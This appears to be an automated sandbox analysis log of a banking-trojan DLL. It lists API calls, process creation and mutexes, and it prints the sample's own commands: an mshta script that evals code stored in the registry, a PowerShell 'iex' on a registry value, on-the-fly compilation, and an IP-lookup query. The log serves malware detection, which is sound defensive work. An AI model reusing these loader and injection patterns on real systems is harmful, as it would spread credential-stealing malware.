                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A722EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A78055 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092A8D4 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092B92C NtReadVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093FAA8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009252DC NtMapViewOfSection,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00921A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00922B08 NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092A444 RtlAllocateHeap,NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00947DAC NtCreateSection,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00940DE0 NtAllocateVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093179C NtSetContextThread,NtUnmapViewOfSection,NtClose,
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0095F002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C2B08 NtQueryInformationProcess,
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67FF002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00961305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00970FA5 NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00967FDD memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096D812 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096D00C memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00977419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00976F70 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: aixojixg.dll.20.drStatic PE information: No import functions for PE file found
                      Source: keehvxm3.dll.24.drStatic PE information: No import functions for PE file found
                      Source: a52acufz.dll.19.drStatic PE information: No import functions for PE file found
                      Source: ddwuzigh.dll.23.drStatic PE information: No import functions for PE file found
                      Source: data.dllBinary or memory string: OriginalFilenameSoon.dll8 vs data.dll
                      Source: data.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211007
                      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: data.dllVirustotal: Detection: 7%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD11B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{023FD26A-79F2-8479-1356-BDF8F7EA41AC}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{5E9A7C9C-253E-40D9-9F72-297443C66DE8}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{BA7B1CC8-D157-FCAE-2B8E-95F08FA29924}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{72D23258-290F-740E-43C6-6DE8275AF19C}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
                      Source: C:\Windows\SysWOW64\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\{82342662-F969-048B-93D6-3D78776AC12C}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{82DD54AC-F9FE-041C-93D6-3D78776AC12C}
                      Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{AEF8588D-35E8-10DC-2FC2-3944D3167DB8}
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: data.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      barindex
                      Suspicious powershell command line foundShow sources
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2263 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2210 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD7AB0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD7E1F push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04584EE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045679B6 push ss; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0458528F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC4EE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA79B6 push ss; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC528F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A77AB0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A77E1F push ecx; ret
